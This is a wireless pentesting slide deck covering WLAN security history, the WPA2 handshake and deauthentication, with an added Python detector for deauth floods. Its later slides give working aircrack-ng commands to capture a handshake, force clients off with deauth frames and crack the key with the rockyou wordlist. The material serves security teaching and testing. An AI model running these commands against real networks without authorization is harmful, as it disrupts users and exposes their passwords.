2. Background
Wireless penetration tests, commonly known as wireless pentests, typically assess three main aspects of a wireless network:
• Range
• Data Security
• Unauthorized Access
3. The Evolution of WLAN Security: Wired Equivalent Privacy (WEP)
Wireless Network Penetration Testing
• 802.11 – first Wireless Local Area Network (WLAN) standard
• Open System Authentication (OSA)
• Shared Key Authentication (SKA)
• Pre-Shared Key (PSK), 64–128 bits
• PSK sent in plain text
• The WEP protocol should not be used
3.59% of networks still use WEP – WiGLE.net/stats
4. The Evolution of WLAN Security: Wi-Fi Protected Access (WPA)
• Established by the Wi-Fi Alliance, under 802.11i
• Pre-Shared Key (PSK), 256 bits and salted
• Temporal Key Integrity Protocol (TKIP)
• WPA Personal
• Launched hastily
• Should not be used
3.48% of networks still use WPA – WiGLE.net/stats
5. The Evolution of WLAN Security: Wi-Fi Protected Access 2 (WPA2)
• Second WLAN standard established by the Wi-Fi Alliance, under 802.11i
• Significant advancement in security over WPA
• Advanced Encryption Standard (AES), 128 bits
• Counter Mode Cipher Block Chaining Message Authentication Code Protocol (CCM Protocol or CCMP)
• Management Frame Protection (MFP) for enterprise
• Susceptible to deauthentication attacks
73.09% of networks use WPA2 – WiGLE.net/stats
6. The Evolution of WLAN Security: Wi-Fi Protected Access 3 (WPA3)
• Third WLAN standard established by the Wi-Fi Alliance, under 802.11ax
• Diffie-Hellman key exchange
• Personal and Enterprise modes
• Personal: CCMP-128 (AES-128 in CCM mode)
• Enterprise: restricts the algorithms used; 192-bit keys (AES-256 in GCM mode with SHA-384 as HMAC)
• Not supported by older/embedded interfaces
• Downgrade/side-channel attacks
0.32% of networks use WPA3 – WiGLE.net/stats
8. Cracking WPA2-PSK: Background
How the four-way handshake works
1. AP → Client (Message 1): the AP sends an ANonce (Authenticator Nonce) to the client
2. Client → AP (Message 2): the client creates an SNonce (Supplicant Nonce), computes some hashes, and sends the SNonce and ANonce back to the AP
3. AP → Client (Message 3): the AP sends a confirmation containing the ANonce, SNonce, and hashes back to the client
4. Client → AP (Message 4): the client sends the AP a final confirmation
How deauthentication works
When a device wants to disconnect, it sends a deauthentication frame to the AP. This is a normal part of Wi-Fi operation.
Deauth attacks
• The attacker sends fraudulent deauthentication frames to a target device
• The frames pretend to be from the AP
• The device disconnects and attempts to reconnect to the AP
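From the defender's side, the difference between a normal disconnect and a deauth attack is volume: one frame versus a burst of frames that all claim the AP as their source. The following detector is an added example (not part of the original slides or the aircrack-ng suite); it assumes frames from a monitor-mode capture have already been exported as (timestamp, subtype, src, dst, bssid) tuples, and the sample frames are constructed.

```python
"""Deauth-flood detector over constructed 802.11 management-frame records.

Added example; not the slides' own tooling. Input tuples are assumed to be
(ts_seconds, frame_subtype, src_mac, dst_mac, bssid) as one might export
from a monitor-mode capture. MFP (802.11w) would make spoofed frames fail
integrity checks; this script is for networks that do not enforce it yet.
"""
from collections import defaultdict, deque

DEAUTH = 0x0C      # management subtype 12 = Deauthentication
DISASSOC = 0x0A    # management subtype 10 = Disassociation (abused the same way)
BROADCAST = "ff:ff:ff:ff:ff:ff"

def detect_deauth_floods(frames, window_s=2.0, threshold=10):
    """Return {bssid: peak_count} for every BSSID that 'sent' at least
    `threshold` deauth/disassoc frames inside any `window_s`-second window.
    Frames whose source is not the BSSID (a client leaving) are ignored."""
    recent = defaultdict(deque)   # bssid -> timestamps inside the current window
    peaks = {}
    for ts, subtype, src, dst, bssid in sorted(frames, key=lambda f: f[0]):
        if subtype not in (DEAUTH, DISASSOC) or src != bssid:
            continue
        q = recent[bssid]
        q.append(ts)
        while q and ts - q[0] > window_s:   # slide the window forward
            q.popleft()
        if len(q) >= threshold:
            peaks[bssid] = max(peaks.get(bssid, 0), len(q))
    return peaks

AP = "aa:bb:cc:dd:ee:01"        # constructed sample addresses
CLIENT = "11:22:33:44:55:66"

def constructed_frames():
    """One legitimate client-initiated deauth, then a burst of 64 frames
    claiming to come from the AP to the broadcast address, then a beacon."""
    frames = [(0.0, DEAUTH, CLIENT, AP, AP)]
    frames += [(30.0 + i * 0.005, DEAUTH, AP, BROADCAST, AP) for i in range(64)]
    frames.append((31.0, 0x08, AP, BROADCAST, AP))   # beacon, not a deauth
    return frames

if __name__ == "__main__":
    for bssid, n in detect_deauth_floods(constructed_frames()).items():
        print(f"possible deauth flood spoofing {bssid}: {n} frames within 2 s")
```

Tune `threshold` and `window_s` to the AP's normal behaviour; an AP that deauthenticates idle clients will produce isolated frames, not bursts.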
10. Wireless Scanning & Discovery
Enable monitor mode on the wireless interface card
• sudo airmon-ng start wlan0
Identify the channel your target AP is operating on
• sudo airodump-ng wlan0
Note the BSSID (MAC address), Channel, and ESSID (network name). Once you've identified the AP information, use CTRL-C to exit.
11. Capture Four-Way Handshake
With monitor mode enabled on the wireless interface card, start airodump-ng
• sudo airodump-ng -c 149 --bssid <macaddress> -w handshake wlan0
As wireless clients connect to this AP, they will appear under the STATION column and will report the BSSID of the AP they are connecting to.
12. Capture Four-Way Handshake
[Image: real-life picture of me waiting to passively capture a four-way handshake]
13. Deauth Attack
In a separate terminal, run aireplay-ng
• sudo aireplay-ng -0 5 -a <apmacaddress> -c <clientmacaddress> wlan0
If you don't know the MAC address of a specific client, you can still send deauthentication packets to all clients connected to the AP. You do this by omitting the `-c` option from your command:
• sudo aireplay-ng -0 5 -a <apmacaddress> wlan0
14. Capture Four-Way Handshake
Success!
In your four-way handshake airodump-ng terminal, you will know you have captured the four-way handshake when you see the "WPA handshake" message next to the target BSSID. This took several tries.
15. Dictionary Attack
Using the rockyou wordlist
• aircrack-ng -w /usr/share/wordlists/rockyou.txt -b <apmacaddress> <name of outputfile>
* Make sure you specify the .cap capture file that airodump-ng wrote with the -w handshake prefix